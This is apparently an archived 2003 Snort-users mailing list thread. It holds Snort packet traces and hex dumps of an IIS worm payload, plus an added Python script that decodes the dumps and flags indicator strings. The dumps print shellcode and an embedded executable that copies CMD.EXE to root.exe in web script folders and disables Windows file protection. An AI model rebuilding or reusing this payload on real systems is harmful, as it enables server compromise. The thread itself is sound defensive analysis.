0x0200: 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 45 52 .......\EXPLORER
0x0210: 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 45 5C .EXE...SOFTWARE\
0x0220: 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 Microsoft\Window
0x0230: 73 20 4E 54 5C 43 s NT\C

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.390693 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3427 IpLen:20 DgmLen:40
***A**** Seq: 0x4216D51E Ack: 0x445C849F Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 63 00 00 40 06 5A F9 A2 12 DF A9 3D B4 .(.c..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 84 9F 50 10 S..P.oB...D\..P.
0x0030: 40 00 69 70 00 00 00 00 00 00 00 00 @.ip........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.561235 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2906 IpLen:20 DgmLen:274 DF
***AP*** Seq: 0x445C869F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 01 12 0B 5A 40 00 69 06 F3 17 3D B4 53 04 A2 12 ...Z@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 86 9F 42 16 D5 1E 50 18 ...o.PD\..B...P.
0x0030: 40 00 EB 3A 00 00 FC FC FC FC FC FC FC FC FC FC @..:............
0x0040: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0050: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0060: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0070: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0080: FC FC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0090: 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A 07 E8 .......^.....j..
0x00A0: 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 72 2E ....d:\explorer.
0x00B0: 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 FF 74 exe...$...U....t
0x00C0: 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 6A 20 M..L......8>u'j 
0x00D0: E8 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .#..............
0x00E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00F0: 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF FF 55 .....j.V..L....U
0x0100: C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 FE C3 .FOu...L....U...
0x0110: 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 00 90 ..d..L....a.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.561436 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3431 IpLen:20 DgmLen:40
***A**** Seq: 0x4216D51E Ack: 0x445C849F Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 67 00 00 40 06 5A F5 A2 12 DF A9 3D B4 .(.g..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 84 9F 50 10 S..P.oB...D\..P.
0x0030: 40 00 69 70 00 00 00 00 00 00 00 00 @.ip........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.578156 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2905 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C849F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 59 40 00 69 06 F2 02 3D B4 53 04 A2 12 .(.Y@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 84 9F 42 16 D5 1E 50 10 ...o.PD\..B...P.
0x0030: 40 00 9E AF 00 00 75 72 72 65 6E 74 56 65 72 73 @.....urrentVers
0x0040: 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 00 53 ion\Winlogon...S
0x0050: 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF FF 53 FCDisable......S
0x0060: 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E YSTEM\CurrentCon
0x0070: 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 trolSet\Services
0x0080: 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 65 72 \W3SVC\Parameter
0x0090: 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 73 00 s\Virtual Roots.
0x00A0: 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 00 2F .../Scripts..../
0x00B0: 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 00 63 MSADC../C../D..c
0x00C0: 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C 2C 2C :\,,217....d:\,,
0x00D0: 32 31 37 FC FC FC FC FC FC FC FC FC FC FC FC FC 217.............
0x00E0: FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................
0x00F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0100: 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 00 00 <0...........0..
0x0110: 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 00 00 `0..L0..........
0x0120: 91 30 00 00 70 30 00 00 00 00 00 00 00 00 00 00 .0..p0..........
0x0130: 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 00 00 .............0..
0x0140: A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 00 00 .0...0.......0..
0x0150: DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 00 00 .0...0...0......
0x0160: 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 .0...0...0......
0x0170: C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 .0...0...0...0..
0x0180: 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C ....KERNEL32.dll
0x0190: 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 00 00 .ADVAPI32.dll...
0x01A0: 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E 64 6F Sleep...GetWindo
0x01B0: 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 00 00 wsDirectoryA....
0x01C0: 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 75 65 WinExec...RegQue
0x01D0: 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 52 65 ryValueExA....Re
0x01E0: 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 00 00 gSetValueExA....
0x01F0: 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 00 00 RegOpenKeyExA...
0x0200: 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC FC FC RegCloseKey.....
0x0210: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0220: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0230: FC FC FC FC FC FC ......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.578364 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3432 IpLen:20 DgmLen:40
***A**** Seq: 0x4216D51E Ack: 0x445C8789 Win: 0x3D16 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 68 00 00 40 06 5A F4 A2 12 DF A9 3D B4 .(.h..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 87 89 50 10 S..P.oB...D\..P.
0x0030: 3D 16 69 70 00 00 00 00 00 00 00 00 =.ip........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.578732 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3433 IpLen:20 DgmLen:254
***AP*** Seq: 0x4216D51E Ack: 0x445C8789 Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 FE 0D 69 00 00 40 06 5A 1D A2 12 DF A9 3D B4 ...i..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 87 89 50 18 S..P.oB...D\..P.
0x0030: 40 00 8A FE 00 00 48 54 54 50 2F 31 2E 30 20 33 @.....HTTP/1.0 3
0x0040: 30 32 20 4E 6F 74 20 41 6C 6C 6F 77 65 64 0D 0A 02 Not Allowed..
0x0050: 4C 6F 63 61 74 69 6F 6E 3A 20 68 74 74 70 3A 2F Location: http:/
0x0060: 2F 77 6D 73 74 2D 77 63 2E 62 61 6C 6C 2E 63 6F /wmst-wc.ball.co
0x0070: 6D 2F 61 63 63 65 73 73 2E 68 74 6D 6C 0D 0A 43 m/access.html..C
0x0080: 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 ontent-Type: tex
0x0090: 74 2F 68 74 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D t/html..Content-
0x00A0: 4C 65 6E 67 74 68 3A 20 39 34 0D 0A 0D 0A 59 6F Length: 94....Yo
0x00B0: 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 ur request is be
0x00C0: 69 6E 67 20 72 65 64 69 72 65 63 74 65 64 20 74 ing redirected t
0x00D0: 6F 20 3A 3C 61 20 68 72 65 66 3D 22 68 74 74 70 o :<a href="http
0x00E0: 3A 2F 2F 77 6D 73 74 2D 77 63 2E 62 61 6C 6C 2E ://wmst-wc.ball.
0x00F0: 63 6F 6D 2F 61 63 63 65 73 73 2E 68 74 6D 6C 22 com/access.html"
0x0100: 3E 68 65 72 65 3C 2F 61 3E 2E 0D 0A >here</a>...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.578800 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3434 IpLen:20 DgmLen:40
***A***F Seq: 0x4216D5F4 Ack: 0x445C8789 Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 6A 00 00 40 06 5A F2 A2 12 DF A9 3D B4 .(.j..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 F4 44 5C 87 89 50 11 S..P.oB...D\..P.
0x0030: 40 00 65 AF 00 00 00 00 00 00 00 00 @.e.........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:55.040386 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2952 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x445C8789 Ack: 0x4216D5F5 Win: 0x3F2A TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 00 28 0B 88 40 00 69 06 F3 D3 3D B4 53 04 A2 12 .(..@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 F5 50 10 ...o.PD\..B...P.
0x0030: 3F 2A 66 85 00 00 00 00 00 00 00 00 ?*f.........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:55.047105 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2953 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x445C8789 Ack: 0x4216D5F5 Win: 0x0 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 00 28 0B 89 40 00 69 06 F3 D2 3D B4 53 04 A2 12 .(..@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 F5 50 04 ...o.PD\..B...P.
0x0030: 00 00 A5 BB 00 00 00 00 00 00 00 00 ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:55.056770 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2951 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x445C8789 Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 00 28 0B 87 40 00 69 06 F3 D4 3D B4 53 04 A2 12 .(..@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 1E 50 10 ...o.PD\..B...P.
0x0030: 40 00 66 86 00 00 00 00 00 00 00 00 @.f.........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:55.057006 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3451 IpLen:20 DgmLen:40
*****R** Seq: 0x4216D51E Ack: 0x0 Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 7B 00 00 40 06 5A E1 A2 12 DF A9 3D B4 .(.{..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 00 00 00 00 50 04 S..P.oB.......P.
0x0030: 40 00 32 78 00 00 00 00 00 00 00 00 @.2x........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

On Tue, Mar 11, 2003 at 10:58:50AM -0500, John Hally wrote:
Hello, This is a different looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? it originated from 219.240.31.44, over in Korea: 000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E.... 010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro 020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E...... 030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E 040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow 050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E 060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i..... () E xV 070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t 080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............ 090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................ 0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. . 0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................ 0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................ 0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X... 0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE ....t....t.;.X. 0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\... 100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........ 110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c 120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu 130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e 140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P. 150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog 160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy 170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root. 
180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P
190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP....
1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................
1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@..............
1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%)....
1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................
1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@.........
200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................
210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@..............
220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... ..........
230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................
240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0..............
250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................
270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ...............
280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`.............
290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00 ...............
2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........
2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0.......
2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@
2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................
2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................
300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h
310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a.....
320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h
330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h.
340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h
350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h....
360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @.
370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@..
380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h
390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @.
3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU..
3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00 @..L..... @..B.
3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h.
3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h
3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5.
3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@...
400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h.
410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U
420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI.
430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>.
440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217
450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5.
460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5.
470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@..
480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@
490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%|
4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@..............
4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE.
4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro
4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\
4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W
500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis
510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM
520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS
530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV
540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir
550 : 74 75 61 6C 20 52 6F 6F tual Roo

-------------------------------------------------------
This SF.net email is sponsored by:Crypto Challenge is now open!
Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod:
http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
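Re-decoding the dumps in this thread is the quickest way to confirm what Snort printed and what the payload carries. The script below is an added example written for this page (not Snort's code, and not from either poster): it parses both hex-dump layouts seen above (the "110 : 5C 43 ..." rows of the quoted post and Snort's "0x0030: ..." rows), decodes the Ethernet/IPv4/TCP header of the first RST packet in the session trace so it can be checked against Snort's own header line, and carves printable strings from a slice of the quoted payload dump to surface the root.exe, EXPLORER.EXE and SFCDisable strings. The dump rows are copied from the messages above; the function names and the short indicator list are my own.

```python
import re
import struct
from typing import Dict, List

# One regex for both dump layouts in the thread: "110 : 5C 43 ..." (quoted
# post) and Snort's "0x0030: 00 00 ..." (session trace). Only the hex column
# is decoded; the ASCII column is lossy ('.' stands for every non-printable
# byte). Both layouts print at most 16 bytes per row, so the {1,16} cap stops
# a hex-looking ASCII column (e.g. "ab cd") from being read as data.
HEXLINE = re.compile(
    r"^\s*(?:0x)?[0-9A-Fa-f]+\s*:\s*((?:[0-9A-Fa-f]{2}(?:\s|$)){1,16})")


def parse_hexdump(text: str) -> bytes:
    """Rebuild raw bytes from dump rows; lines that are not rows are skipped."""
    out = bytearray()
    for line in text.splitlines():
        m = HEXLINE.match(line)
        if m:
            out.extend(bytes.fromhex(m.group(1)))
    return bytes(out)


def snort_flags(bits: int) -> str:
    """Render TCP flag bits the way Snort does ('12UAPRSF', '*' when clear)."""
    return "".join(n if bits & (0x80 >> i) else "*"
                   for i, n in enumerate("12UAPRSF"))


def decode_frame(frame: bytes) -> Dict[str, object]:
    """Decode Ethernet II / IPv4 / TCP headers from a full-frame dump.

    Returns the fields Snort prints in its packet header lines, so the dump
    bytes can be checked against what the sensor reported.
    """
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an Ethernet II frame carrying IPv4")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6 or len(ip) < ihl + 16:
        raise ValueError("not IPv4/TCP, or TCP header truncated")
    ip_len, ip_id, flags_frag = struct.unpack("!HHH", ip[2:8])
    sport, dport, seq, ack, off, flags, window = struct.unpack(
        "!HHIIBBH", ip[ihl:ihl + 16])
    return {
        "src": ".".join(map(str, ip[12:16])),
        "dst": ".".join(map(str, ip[16:20])),
        "ttl": ip[8], "ip_id": ip_id, "ip_len": ip_len,
        "df": bool(flags_frag & 0x4000),        # IP "don't fragment" bit
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": snort_flags(flags), "window": window,
        "tcp_len": (off >> 4) * 4,              # data offset, in bytes
    }


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """strings(1)-style carve: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# My own short list of substrings worth flagging in a payload that tripped
# the CMD.EXE rule, drawn from the strings visible in the dump above.
INDICATORS = ("cmd.exe", "root.exe", "explorer.exe", "sfcdisable")


def find_indicators(data: bytes) -> List[str]:
    """Carved strings that contain an indicator substring (case-insensitive)."""
    return [s for s in printable_strings(data)
            if any(ind in s.lower() for ind in INDICATORS)]


# Dump rows copied from this thread: the first RST of the session trace
# (Snort layout) and a slice of the quoted payload dump (rows 100-140, 4c0-510).
RST_DUMP = r"""
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 00 28 0B 89 40 00 69 06 F3 D2 3D B4 53 04 A2 12 .(..@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 F5 50 04 ...o.PD\..B...P.
0x0030: 00 00 A5 BB 00 00 00 00 00 00 00 00 ............
"""

PAYLOAD_DUMP = r"""
100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P.
4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE.
4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro
4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\
4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W
500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis
510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM
"""

if __name__ == "__main__":
    hdr = decode_frame(parse_hexdump(RST_DUMP))
    print(f"{hdr['src']}:{hdr['sport']} -> {hdr['dst']}:{hdr['dport']} "
          f"TTL:{hdr['ttl']} ID:{hdr['ip_id']} {hdr['flags']} Win:{hdr['window']:#x}")
    for s in find_indicators(parse_hexdump(PAYLOAD_DUMP)):
        print("indicator:", s)
```

The decoded RST header reproduces Snort's line exactly (61.180.83.4:4975 -> 162.18.223.169:80, TTL 105, ID 2953, DF, `*****R**`, Win 0x0), and the carve pulls `d:\inetpub\scripts\root.exe` out of the payload whole, even though the ASCII column of the dump splits it across three rows. Carving from the hex rather than the ASCII column matters because the dump's `.` placeholders hide every byte outside 0x20-0x7e.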
Current thread:
- different CMD.exe access?!? John Hally (Mar 11)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)
- Re: different CMD.exe access?!? Jason (Mar 14)
